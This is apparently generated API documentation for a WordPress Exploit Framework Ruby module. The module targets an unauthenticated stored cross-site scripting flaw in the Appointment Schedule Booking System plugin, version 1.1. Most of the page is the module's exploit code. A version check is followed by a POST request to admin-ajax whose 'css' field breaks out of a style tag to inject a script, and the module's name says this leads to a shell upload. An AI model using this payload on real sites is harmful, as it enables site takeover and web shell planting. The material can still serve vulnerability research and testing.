class Wpxf::Exploit::AppointmentScheduleBookingSystemStoredXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Appointment Schedule Booking System Unauthenticated Stored XSS Shell Upload',
    author: [
      'White Fir Design', # Disclosure
      'rastating'         # WPXF module
    ],
    references: [
      ['WPVDB', '8634'],
      ['URL', 'https://www.pluginvulnerabilities.com/2016/10/03/persistent-cross-site-scripting-xss-vulnerability-in-wordpress-appointment-schedule-booking-system/']
    ],
    date: 'Oct 04 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 23
def check
  check_plugin_version_from_readme('wp-appointment-schedule-booking-system', '1.1')
end
store_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 31
def store_script
  execute_post_request(
    url: wordpress_url_admin_ajax,
    body: {
      'action' => 'appointgen_save_cssfixfront',
      'cssfix' => 'front',
      'css' => "</style></style><script>#{xss_include_script}</script><style>"
    }
  )
end
vulnerable_page() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 27
def vulnerable_page
  'the page containing the appointment schedule'
end